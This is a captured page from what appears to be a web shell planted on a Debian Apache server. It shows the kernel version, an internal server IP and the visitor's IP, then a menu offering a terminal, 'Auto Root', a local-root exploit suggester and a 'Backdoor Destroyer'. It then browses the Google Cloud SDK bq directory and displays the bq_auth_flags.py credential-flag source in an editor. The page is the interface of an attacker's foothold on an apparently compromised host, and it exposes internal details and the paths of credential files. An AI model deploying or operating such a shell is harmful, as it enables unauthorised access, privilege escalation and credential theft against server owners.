Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
google-cloud-sdk /
platform /
bq /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
auth
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
clients
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
discovery_documents
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
discovery_next
[ DIR ]
drwxr-xr-x
2026-06-08 18:07
frontend
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
gcloud_wrapper
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
third_party
[ DIR ]
drwxr-xr-x
2025-05-13 15:05
utils
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
LICENSE.txt
11.09
KB
-rw-r--r--
1980-01-01 08:00
MANIFEST.in
47
B
-rw-r--r--
1980-01-01 08:00
README.txt
2.15
KB
-rw-r--r--
1980-01-01 08:00
VERSION
7
B
-rw-r--r--
1980-01-01 08:00
bigquery_client.py
92
B
-rw-r--r--
1980-01-01 08:00
bq.py
4.74
KB
-rwxr-xr-x
1980-01-01 08:00
bq_auth_flags.py
1.76
KB
-rw-r--r--
1980-01-01 08:00
bq_flags.py
8.77
KB
-rw-r--r--
1980-01-01 08:00
bq_utils.py
16.21
KB
-rw-r--r--
1980-01-01 08:00
credential_loader.py
12.59
KB
-rw-r--r--
1980-01-01 08:00
remove_pyreadline.py
3.4
KB
-rw-r--r--
1980-01-01 08:00
table_formatter.py
19.23
KB
-rw-r--r--
1980-01-01 08:00
wrapped_credentials.py
7.15
KB
-rw-r--r--
1980-01-01 08:00
Save
Rename
#!/usr/bin/env python """Auth flags for calling BigQuery.""" import os from typing import Optional from absl import flags USE_GCE_SERVICE_ACCOUNT = flags.DEFINE_boolean( 'use_gce_service_account', False, 'Only for the gcloud wrapper use.' ) CREDENTIAL_FILE = flags.DEFINE_string( 'credential_file', os.path.join( os.path.expanduser('~'), '.bigquery.v2.token' ), 'Only for the gcloud wrapper use.' ) APPLICATION_DEFAULT_CREDENTIAL_FILE: flags.FlagHolder[Optional[str]] = ( flags.DEFINE_string( 'application_default_credential_file', '', 'Only for the gcloud wrapper use.' ) ) SERVICE_ACCOUNT: flags.FlagHolder[Optional[str]] = flags.DEFINE_string( 'service_account', '', 'Only for the gcloud wrapper use.' ) SERVICE_ACCOUNT_PRIVATE_KEY_FILE: flags.FlagHolder[Optional[str]] = ( flags.DEFINE_string( 'service_account_private_key_file', '', 'Only for the gcloud wrapper use.' ) ) SERVICE_ACCOUNT_PRIVATE_KEY_PASSWORD = flags.DEFINE_string( 'service_account_private_key_password', 'notasecret', 'Only for the gcloud wrapper use.' ) SERVICE_ACCOUNT_CREDENTIAL_FILE = flags.DEFINE_string( 'service_account_credential_file', None, 'Only for the gcloud wrapper use.' ) OAUTH_ACCESS_TOKEN = flags.DEFINE_string( 'oauth_access_token', '', 'Only for the gcloud wrapper use.' ) USE_GOOGLE_AUTH = flags.DEFINE_boolean( 'use_google_auth', True, 'Use new google auth libraries.', ) QUOTA_PROJECT_ID: flags.FlagHolder[Optional[str]] = flags.DEFINE_string( 'quota_project_id', None, 'ID of a Google Cloud Project as the quota project to be used for billing ' 'and quota limits.', allow_hide_cpp=True, allow_override=True, )